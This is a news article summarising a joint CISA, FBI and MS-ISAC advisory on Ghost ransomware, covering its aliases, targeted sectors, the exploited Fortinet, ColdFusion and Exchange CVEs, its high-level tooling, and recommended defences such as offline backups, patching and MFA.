The Cybersecurity and Infrastructure Security Agency (CISA) and the FBI warned about the widespread impact of Ghost ransomware, which has breached victims across more than 70 countries.
The targeted sectors include critical infrastructure, healthcare, government, education, technology, manufacturing, and small-to-medium-sized businesses.
According to a joint advisory released by CISA, the FBI, and the Multi-State Information Sharing and Analysis Center (MS-ISAC), Ghost ransomware actors have been exploiting outdated software and firmware since early 2021. These attacks have compromised a wide range of organizations, including entities in China.
Evolving Tactics and Attribution Challenges
Ghost ransomware operators frequently alter their malware executables, modify encrypted file extensions, update ransom note contents, and use multiple email addresses for ransom negotiations. This fluid approach has made it difficult to attribute attacks to a single group with certainty.
Several aliases associated with Ghost ransomware include Ghost, Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture. Malware samples linked to these attacks include Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe. The group primarily exploits known vulnerabilities in unpatched systems, such as those in Fortinet (CVE-2018-13379), ColdFusion (CVE-2010-2861, CVE-2009-3960), and Microsoft Exchange (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207).
How to Protect Against Ghost Ransomware
To mitigate the risks posed by Ghost ransomware, security experts recommend taking the following precautions:
- Regularly back up systems and store backups offline to prevent ransomware encryption.
- Apply patches to operating systems, software, and firmware without delay.
- Prioritize fixes for vulnerabilities exploited by Ghost ransomware.
- Segment networks to minimize the spread of infections.
- Implement phishing-resistant multi-factor authentication (MFA) for privileged accounts and email services.
How Ghost Ransomware Operates
Ghost ransomware was first detected in early 2021 by Amigo_A and Swisscom’s CSIRT team. The attackers initially used custom Mimikatz samples, followed by CobaltStrike beacons, and deployed ransomware payloads through Windows CertUtil, a legitimate certificate management tool, to evade security defenses.
Beyond ransomware attacks, state-backed hacking groups have also been observed exploiting the Fortinet SSL VPN vulnerability (CVE-2018-13379). This flaw has been used to gain unauthorized access to critical systems, including U.S. election support infrastructure.
Despite multiple warnings from Fortinet in 2019, 2020, and 2021 urging customers to patch their SSL VPN appliances, many organizations remain vulnerable.
The latest advisory from CISA, the FBI, and MS-ISAC provides additional details on indicators of compromise (IOCs), tactics, techniques, procedures (TTPs), and detection methods observed in Ghost ransomware campaigns, including those investigated as recently as January 2025.
